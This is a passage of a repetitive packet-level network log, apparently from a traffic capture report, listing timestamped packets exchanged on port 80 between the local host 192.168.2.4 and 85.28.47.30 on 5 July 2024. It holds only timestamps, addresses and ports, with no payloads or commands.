                                                                Jul 5, 2024 04:35:59.785860062 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.785900116 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.794080019 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.794095993 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.794121027 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.794137001 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.794151068 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.794156075 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.794167995 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.794187069 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.794241905 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.794271946 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.794308901 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.794325113 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.794326067 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.794358969 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.794379950 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.794399023 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.794414997 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.794430017 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.794445992 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.794450998 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.794462919 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.794470072 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.794486046 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.794498920 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.794502974 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.794533968 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.794554949 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.795228958 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.795243979 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.795260906 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.795280933 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.795310974 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.795319080 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.795335054 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.795350075 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.795361996 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.795376062 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.795392036 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.795398951 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.795408010 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.795432091 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.795452118 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.796056986 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.796072006 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.796089888 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.796106100 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.796117067 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.796120882 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.796139956 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.796154022 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.796186924 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.796211004 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.796225071 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.796240091 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.796256065 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.796272039 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.796304941 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.796961069 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.796976089 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.796991110 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.797013044 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.797045946 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.797054052 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.797069073 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.797084093 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.797100067 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.797101021 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.797131062 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.797158957 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.797163010 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.797178030 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.797194004 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.797207117 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.797224998 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.797243118 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.797821045 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.797866106 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.797944069 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.797960043 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.797982931 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.797996044 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.797996998 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.798005104 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.798022985 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.798024893 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.798041105 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.798044920 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.798063993 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.798064947 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.798079967 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.798089027 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.798096895 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.798104048 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.798129082 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.798140049 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.798753023 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.798800945 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.869699001 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.869740963 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.869756937 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.869759083 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.869786024 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.869791985 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.869801044 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.869808912 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.869837046 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.869848967 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.869853020 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.869868994 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.869884968 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.869887114 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.869910002 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.869932890 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.869955063 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.869971037 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.869987011 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.870002985 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.870016098 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.870034933 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.870058060 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.870074034 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.870086908 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.870104074 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.870121002 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.870124102 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.870136976 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.870151043 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.870151997 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.870168924 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.870196104 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.870213032 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.870531082 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.870583057 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.870592117 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.870609045 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.870625019 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.870630026 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.870642900 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.870649099 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.870667934 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.870686054 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.876399040 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.876411915 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.876427889 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.876454115 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.876471996 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.876472950 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.876514912 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.876576900 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.876625061 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.876684904 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.876699924 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.876714945 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.876734018 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.876746893 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.876787901 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.876805067 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.876820087 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.876837969 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.876851082 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.876862049 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.876867056 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.876878023 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.876882076 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.876893044 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.876899004 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.876912117 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.876929045 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.876935005 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.876955986 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.876972914 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.877019882 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.877022028 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.877038002 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.877063990 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.877074003 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.877178907 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.877194881 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.877209902 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.877229929 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.877242088 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.877255917 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.877268076 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.877283096 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.877298117 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.877310991 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.877315044 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.877324104 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.877341032 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.877350092 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.877357960 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.877367973 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.877383947 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.877393961 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.877399921 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.877413034 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.877415895 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.877419949 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.877444029 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.877458096 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.877801895 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.877854109 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.877856970 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.877909899 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.885886908 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.885938883 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.885951042 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.885966063 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.885994911 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.886007071 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.886089087 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.886104107 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.886120081 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.886132956 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.886137009 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.886148930 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.886162996 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.886171103 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.886179924 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.886195898 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.886207104 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.886210918 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.886226892 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.886240959 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.886255980 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.886378050 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.886393070 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.886409998 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.886425972 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.886436939 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.886454105 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.886456013 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.886471033 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.886487007 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.886498928 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.886518002 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.886528015 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.886636019 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.886682034 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.886738062 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.886753082 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.886789083 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.886801004 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.886827946 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.886842966 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.886856079 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.886871099 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.886882067 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.886894941 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.886919975 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.887053013 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.887068033 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.887084961 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.887094021 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.887124062 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.887125015 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.887140989 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.887156963 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.887171030 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.887171984 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.887200117 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.887214899 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.887232065 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.887248039 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.887260914 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.887275934 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.887278080 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.887290955 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.887311935 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.887324095 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.887676954 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.887691975 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.887712955 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.887728930 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.887753010 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.887763023 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.887778044 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.887792110 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.887808084 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.887808084 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.887836933 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.887861013 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.887870073 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.887885094 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.887901068 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.887914896 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.887917995 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.887928963 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.887934923 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.887950897 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.887964964 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.887983084 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.888338089 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.888354063 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.888367891 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.888394117 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.888426065 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.888437986 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.888459921 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.888475895 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.888499022 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.888499975 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.888508081 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.888515949 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.888525963 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.888534069 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.888545036 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.888559103 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.888573885 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.961466074 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.961513996 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.961529970 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.961561918 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.961576939 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.961594105 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.961627960 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.961646080 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.961659908 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.961677074 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.961693048 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.961708069 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.961724043 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.961730957 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.961739063 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.961780071 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.961795092 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.961807966 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.961884022 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.962178946 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.962193966 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.962208986 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.962228060 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.962234020 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.962244034 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.962248087 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.962261915 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.962275028 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.962287903 CEST4973080192.168.2.485.28.47.30
